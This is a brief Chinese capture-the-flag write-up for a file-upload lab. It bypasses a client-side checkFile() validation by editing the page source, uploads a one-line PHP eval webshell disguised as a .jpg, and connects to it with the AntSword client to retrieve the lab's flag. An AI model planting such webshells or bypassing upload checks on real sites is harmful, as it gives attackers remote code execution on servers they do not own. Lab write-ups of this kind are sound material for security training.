赞
踩
环境:kali
工具:中国蚁剑
进入靶机如下:
下载并查看源码:
注意到checkFile()函数
将50行处"return checkFile()"改为"return true",然后保存。
新建test.php文件,输入木马代码
<?php @eval($_POST[123])?>
然后保存,并重命名为test.php.jpg。
打开html,在Pass-02上传test.php.jpg。
因为文件本身不是jpg格式,所以无法显示。
复制图片地址,然后打开蚁剑,右键选择添加数据,复制地址到URL地址,连接密码为123,点添加。
进入目录,下拉即可看到flag。
得到flag{2bb03dc0-ef84-490c-8a59-c3638797af75}。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。